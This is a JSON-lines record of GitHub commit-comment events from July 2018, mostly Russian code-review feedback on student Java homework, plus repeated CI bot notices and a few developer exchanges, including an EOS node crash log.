{"id":"8000635750","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793782,"position":null,"line":null,"path":null,"commit_id":"250f38961bad79a012f5b91bfe50b771fa2fed88","created_at":"2018-07-22T18:16:11Z","updated_at":"2018-07-22T18:16:11Z","author_association":"OWNER","body":"✅ Detekt: Great Stuff! 👍"}},"created_at":"2018-07-22T18:16:11Z"}
{"id":"8000636929","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793785,"position":24,"line":24,"path":"src/lesson5/Homework1.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:17:00Z","updated_at":"2018-07-22T18:17:00Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-22T18:17:00Z"}
{"id":"8000637725","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793787,"position":16,"line":16,"path":"src/lesson6/Rectangle.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:17:34Z","updated_at":"2018-07-22T18:17:34Z","author_association":"NONE","body":"переставай сокрашать имена всего, что есть в программе!"}},"created_at":"2018-07-22T18:17:34Z"}
{"id":"8000638011","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793788,"position":3,"line":3,"path":"src/lesson6/Rectangle.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:17:47Z","updated_at":"2018-07-22T18:17:47Z","author_association":"NONE","body":"делай отступ между классом и полями"}},"created_at":"2018-07-22T18:17:47Z"}
{"id":"8000638447","type":"CommitCommentEvent","actor":{"login":"Qiangong2"},"repo":{"name":"Qiangong2/android_device_samsung_jf-common"},"payload":{"comment":{"id":29793790,"position":null,"line":null,"path":null,"commit_id":"b43f74832074e67a9ab25557b8ee18b0aaebef16","created_at":"2018-07-22T18:18:07Z","updated_at":"2018-07-22T18:18:07Z","author_association":"OWNER","body":"Not Ubuntu Touch. For that, you need to build halium-boot successfully. I have only built Hybris-Boot successfully. "}},"created_at":"2018-07-22T18:18:07Z"}
{"id":"8000638600","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29793792,"position":null,"line":null,"path":null,"commit_id":"83143978cf7eec99d5502b705996fc17e5b3649e","created_at":"2018-07-22T18:18:13Z","updated_at":"2018-07-22T18:18:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-346](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-346).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-346-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-22T18:18:13Z"}
{"id":"8000639513","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793794,"position":3,"line":3,"path":"src/homework/homework06/Point.java","commit_id":"62c3e3bb63578899221676e176a9fd16512d1ab6","created_at":"2018-07-22T18:18:57Z","updated_at":"2018-07-22T18:18:57Z","author_association":"NONE","body":"делай отступ между классом и полями"}},"created_at":"2018-07-22T18:18:57Z"}
{"id":"8000639558","type":"CommitCommentEvent","actor":{"login":"mimugmail"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29793796,"position":null,"line":null,"path":null,"commit_id":"520a51be150753c2432164212be38e2af0b034ae","created_at":"2018-07-22T18:18:59Z","updated_at":"2018-07-22T18:18:59Z","author_association":"MEMBER","body":"GitHub.com auto-tab :)"}},"created_at":"2018-07-22T18:18:59Z"}
{"id":"8000640186","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29793798,"position":null,"line":null,"path":null,"commit_id":"4a6dafa3c7ccfc6f7da9970a834b818c5442fd9b","created_at":"2018-07-22T18:19:25Z","updated_at":"2018-07-22T18:19:25Z","author_association":"COLLABORATOR","body":"Ok, if this is indeed a development version that makes sense."}},"created_at":"2018-07-22T18:19:25Z"}
{"id":"8000640205","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793799,"position":13,"line":13,"path":"src/homework/homework06/Point.java","commit_id":"62c3e3bb63578899221676e176a9fd16512d1ab6","created_at":"2018-07-22T18:19:25Z","updated_at":"2018-07-22T18:19:25Z","author_association":"NONE","body":"не совсем понятен смысл этого метода"}},"created_at":"2018-07-22T18:19:25Z"}
{"id":"8000641259","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793800,"position":14,"line":14,"path":"src/homework/homework06/Rectangle.java","commit_id":"62c3e3bb63578899221676e176a9fd16512d1ab6","created_at":"2018-07-22T18:20:08Z","updated_at":"2018-07-22T18:20:08Z","author_association":"NONE","body":"как-то сложно ты тут написал, не уверен даже. что верно"}},"created_at":"2018-07-22T18:20:08Z"}
{"id":"8000642344","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793801,"position":19,"line":19,"path":"src/homework/homework05/Task1.java","commit_id":"ba85e376dcbadaf86ff6bb090631c29462082979","created_at":"2018-07-22T18:20:54Z","updated_at":"2018-07-22T18:20:54Z","author_association":"NONE","body":"все выносить в функции, мейн только для тестирования, никакой логики там быть не должно"}},"created_at":"2018-07-22T18:20:54Z"}
{"id":"8000642452","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793802,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-22T18:20:59Z","updated_at":"2018-07-22T18:20:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:20:59Z"}
{"id":"8000642964","type":"CommitCommentEvent","actor":{"login":"nike4613"},"repo":{"name":"nike4613/BeatSaberButtonMapper"},"payload":{"comment":{"id":29793805,"position":null,"line":null,"path":null,"commit_id":"086ee1830e0a2a74c1ca1ef77ada371e63d82140","created_at":"2018-07-22T18:21:21Z","updated_at":"2018-07-22T18:21:21Z","author_association":"OWNER","body":"hmmm, coulda sworn IPA created the folder at some point"}},"created_at":"2018-07-22T18:21:21Z"}
{"id":"8000643143","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793806,"position":23,"line":23,"path":"src/homework/homework05/Task2.java","commit_id":"ba85e376dcbadaf86ff6bb090631c29462082979","created_at":"2018-07-22T18:21:29Z","updated_at":"2018-07-22T18:21:29Z","author_association":"NONE","body":"странная проверка"}},"created_at":"2018-07-22T18:21:29Z"}
{"id":"8000643527","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793810,"position":23,"line":23,"path":"src/homework/homework05/Task2.java","commit_id":"ba85e376dcbadaf86ff6bb090631c29462082979","created_at":"2018-07-22T18:21:46Z","updated_at":"2018-07-22T18:21:46Z","author_association":"NONE","body":"и зачем приводить явно к чару то, что и так является чаром?\r\n"}},"created_at":"2018-07-22T18:21:46Z"}
{"id":"8000643621","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793811,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-22T18:21:51Z","updated_at":"2018-07-22T18:21:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:21:51Z"}
{"id":"8000643645","type":"CommitCommentEvent","actor":{"login":"karissa"},"repo":{"name":"digidem/mapeo-server"},"payload":{"comment":{"id":29793812,"position":null,"line":null,"path":null,"commit_id":"743194f3654b5e99d7470bfcae82cfb60a3e64df","created_at":"2018-07-22T18:21:52Z","updated_at":"2018-07-22T18:21:52Z","author_association":"COLLABORATOR","body":"@gmaclennan it seems like your fork of safe-fs-blob-store is not any different, did you push changes?\r\n\r\nIt would be great to just open a PR on the main repo and publish a fix if it's a bug!"}},"created_at":"2018-07-22T18:21:52Z"}
{"id":"8000643710","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793813,"position":30,"line":30,"path":"src/homework/homework05/Task2.java","commit_id":"ba85e376dcbadaf86ff6bb090631c29462082979","created_at":"2018-07-22T18:21:54Z","updated_at":"2018-07-22T18:21:54Z","author_association":"NONE","body":"функция с большой буквы!"}},"created_at":"2018-07-22T18:21:54Z"}
{"id":"8000644090","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793815,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-22T18:22:11Z","updated_at":"2018-07-22T18:22:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:22:11Z"}
{"id":"8000644548","type":"CommitCommentEvent","actor":{"login":"karissa"},"repo":{"name":"digidem/mapeo-server"},"payload":{"comment":{"id":29793816,"position":null,"line":null,"path":null,"commit_id":"743194f3654b5e99d7470bfcae82cfb60a3e64df","created_at":"2018-07-22T18:22:28Z","updated_at":"2018-07-22T18:22:28Z","author_association":"COLLABORATOR","body":"just kidding found the branch"}},"created_at":"2018-07-22T18:22:28Z"}
{"id":"8000644631","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793817,"position":30,"line":30,"path":"src/homework/homework05/Task2.java","commit_id":"ba85e376dcbadaf86ff6bb090631c29462082979","created_at":"2018-07-22T18:22:31Z","updated_at":"2018-07-22T18:22:31Z","author_association":"NONE","body":"зачем передавать StringBuilder если ты все равно конвертишь в строку в алгоритме?"}},"created_at":"2018-07-22T18:22:31Z"}
{"id":"8000644649","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29793818,"position":null,"line":null,"path":null,"commit_id":"520a51be150753c2432164212be38e2af0b034ae","created_at":"2018-07-22T18:22:32Z","updated_at":"2018-07-22T18:22:32Z","author_association":"MEMBER","body":"it's tabs here, github put in spaces. nevermind, it's alright :D"}},"created_at":"2018-07-22T18:22:32Z"}
{"id":"8000653878","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793850,"position":54,"line":54,"path":"src/homework/homework04/Task2.java","commit_id":"2507929bc54f6487fbdaa3a19c6cc6395d44766a","created_at":"2018-07-22T18:29:17Z","updated_at":"2018-07-22T18:29:17Z","author_association":"NONE","body":"не оптимально по памяти, можно было сделать без создания лишних массивов булеан и т.д.\r\nhttps://leetcode.com/problems/remove-duplicates-from-sorted-array/solution/"}},"created_at":"2018-07-22T18:29:17Z"}
{"id":"8000653881","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793851,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-22T18:29:17Z","updated_at":"2018-07-22T18:29:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:29:17Z"}
{"id":"8000654601","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793854,"position":38,"line":38,"path":"src/homework/homework04/Task4.java","commit_id":"2507929bc54f6487fbdaa3a19c6cc6395d44766a","created_at":"2018-07-22T18:29:52Z","updated_at":"2018-07-22T18:29:52Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-22T18:29:52Z"}
{"id":"8000654827","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793856,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-22T18:30:03Z","updated_at":"2018-07-22T18:30:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:30:03Z"}
{"id":"8000655024","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793858,"position":42,"line":42,"path":"src/homework/homework04/Task4.java","commit_id":"2507929bc54f6487fbdaa3a19c6cc6395d44766a","created_at":"2018-07-22T18:30:11Z","updated_at":"2018-07-22T18:30:11Z","author_association":"NONE","body":"просто length += numI[i].length"}},"created_at":"2018-07-22T18:30:11Z"}
{"id":"8000655462","type":"CommitCommentEvent","actor":{"login":"trungtt1981"},"repo":{"name":"NebulaProtocol/eos"},"payload":{"comment":{"id":29793861,"position":null,"line":null,"path":null,"commit_id":"35fbdb0fc75c0a9cb19d869a19f20060e261c3aa","created_at":"2018-07-22T18:30:28Z","updated_at":"2018-07-22T18:30:28Z","author_association":"NONE","body":"@asiniscalchi \r\n@kesar \r\nI've followed your instruction on this link: https://gist.github.com/kesar/35eb26f6863494e62200e943f6b184ff\r\n\r\nUnfortunately, I've got exception when starting the nodeos instance as follows:\r\n\r\n```\r\n1240943ms thread-0   http_plugin.cpp:447           add_handler          ] add api url: /v1/history/get_actions\r\n1240943ms thread-0   http_plugin.cpp:447           add_handler          ] add api url: /v1/history/get_controlled_accounts\r\n1240943ms thread-0   http_plugin.cpp:447           add_handler          ] add api url: /v1/history/get_key_accounts\r\n1240943ms thread-0   http_plugin.cpp:447           add_handler          ] add api url: /v1/history/get_transaction\r\n1240944ms thread-0   net_plugin.cpp:3049           plugin_startup       ] starting listener, max clients is 25\r\n1240944ms thread-0   net_plugin.cpp:749            connection           ] created connection to 138.197.194.220:9002\r\n1240944ms thread-0   net_plugin.cpp:1962           connect              ] host: 138.197.194.220 port: 9002 \r\nterminate called after throwing an instance of 'eosio::chain::abi_serialization_deadline_exception'\r\n./script_client_nodeos.sh: line 7: 15709 Aborted                 (core dumped) $NODEOS --genesis-json genesis.json --config-dir . --data-dir . --plugin eosio::chain_api_plugin --plugin eosio::sql_db_plugin --sql_db-uri=\"mysql://db=eos user=root password=feesimple host=127.0.0.1\"\r\n```\r\n\r\nI don't know if my currently-used `config.ini` is wrong or not.\r\nIf possible, please provide your `config.ini` file so that I can compare\r\nThanks"}},"created_at":"2018-07-22T18:30:28Z"}
{"id":"8000655466","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793862,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-22T18:30:28Z","updated_at":"2018-07-22T18:30:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:30:28Z"}
{"id":"8000655472","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29793863,"position":44,"line":44,"path":"src/homework/homework04/Task4.java","commit_id":"2507929bc54f6487fbdaa3a19c6cc6395d44766a","created_at":"2018-07-22T18:30:28Z","updated_at":"2018-07-22T18:30:28Z","author_association":"NONE","body":"называть переменные и параметры нормально, без сокращений!"}},"created_at":"2018-07-22T18:30:28Z"}
{"id":"8000656017","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29793864,"position":70,"line":1769,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d41cc4f8d29e158f20fa2fcc6255bac7864d7b7","created_at":"2018-07-22T18:30:53Z","updated_at":"2018-07-22T18:30:53Z","author_association":"COLLABORATOR","body":"Hmm what is this?"}},"created_at":"2018-07-22T18:30:53Z"}
{"id":"8000656462","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793865,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-22T18:31:13Z","updated_at":"2018-07-22T18:31:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:31:13Z"}
{"id":"8000656995","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793866,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-22T18:31:37Z","updated_at":"2018-07-22T18:31:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:31:37Z"}
{"id":"8000657087","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29793867,"position":40,"line":1739,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d41cc4f8d29e158f20fa2fcc6255bac7864d7b7","created_at":"2018-07-22T18:31:41Z","updated_at":"2018-07-22T18:31:41Z","author_association":"COLLABORATOR","body":"Kahin maybe?"}},"created_at":"2018-07-22T18:31:41Z"}
{"id":"8000657777","type":"CommitCommentEvent","actor":{"login":"joshuaaguilar20"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793868,"position":209,"line":71,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T18:32:16Z","updated_at":"2018-07-22T18:32:16Z","author_association":"OWNER","body":"got it! \r\n"}},"created_at":"2018-07-22T18:32:16Z"}
{"id":"8000657959","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793869,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-22T18:32:24Z","updated_at":"2018-07-22T18:32:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:32:24Z"}
{"id":"8000658458","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793870,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-22T18:32:48Z","updated_at":"2018-07-22T18:32:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:32:48Z"}
{"id":"8000658485","type":"CommitCommentEvent","actor":{"login":"joshuaaguilar20"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793871,"position":217,"line":79,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T18:32:49Z","updated_at":"2018-07-22T18:32:49Z","author_association":"OWNER","body":"this was self comment that I forgot to remove..."}},"created_at":"2018-07-22T18:32:49Z"}
{"id":"8000658535","type":"CommitCommentEvent","actor":{"login":"labnol"},"repo":{"name":"labnol/apps-script-starter"},"payload":{"comment":{"id":29793872,"position":null,"line":null,"path":null,"commit_id":"23aa9f5c2b0f69b1ea368f5eb3e69fdcdb14d480","created_at":"2018-07-22T18:32:52Z","updated_at":"2018-07-22T18:32:52Z","author_association":"OWNER","body":"Removed check for .ts files."}},"created_at":"2018-07-22T18:32:52Z"}
{"id":"8000658723","type":"CommitCommentEvent","actor":{"login":"joshuaaguilar20"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793873,"position":217,"line":79,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T18:33:02Z","updated_at":"2018-07-22T18:33:02Z","author_association":"OWNER","body":"haha"}},"created_at":"2018-07-22T18:33:02Z"}
{"id":"8000659380","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29793875,"position":27,"line":43,"path":"code/drasil-lang/Language/Drasil/Development/Unit.hs","commit_id":"0081c9c57865eda8945186d35fc6e8e4408a2bc4","created_at":"2018-07-22T18:33:31Z","updated_at":"2018-07-22T18:33:31Z","author_association":"OWNER","body":"why is this line of code 'centered'?"}},"created_at":"2018-07-22T18:33:31Z"}
{"id":"8000659426","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793876,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-22T18:33:33Z","updated_at":"2018-07-22T18:33:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:33:33Z"}
